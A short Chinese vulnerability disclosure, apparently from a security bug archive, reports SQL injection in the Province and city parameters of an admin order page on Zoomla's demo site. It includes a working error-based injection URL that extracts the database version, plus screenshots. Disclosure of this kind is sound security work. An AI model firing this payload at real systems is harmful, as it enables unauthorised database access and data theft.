### 简要描述:
RT
### 详细说明:
好看到多人都在挖啊,于是发现官网的demo站点也更新了哦。
果断捡捡便宜。
http://demo.zoomla.cn/Admin/i/Shop/OrderList.aspx?Province=&city=
Province参数和city参数过滤不严,未加验证,导致直接可以注入啊。
### 漏洞证明:
漏洞验证:
```
http://demo.zoomla.cn/Admin/i/Shop/OrderList.aspx?Province=1%27%20aNd%021=@@version%20aNd%02%271%27=%271&city=
```
[<img src="https://images.seebug.org/upload/201408/10223437ee0493bb3909ea4c5bbf5364d2f2538e.jpg" alt="QQ图片20140810223433.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10223437ee0493bb3909ea4c5bbf5364d2f2538e.jpg)
[<img src="https://images.seebug.org/upload/201408/1022350454d05d7a8e9c515edb0ba62bbed5f0a9.jpg" alt="QQ图片20140810223459.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/1022350454d05d7a8e9c515edb0ba62bbed5f0a9.jpg)
暂无评论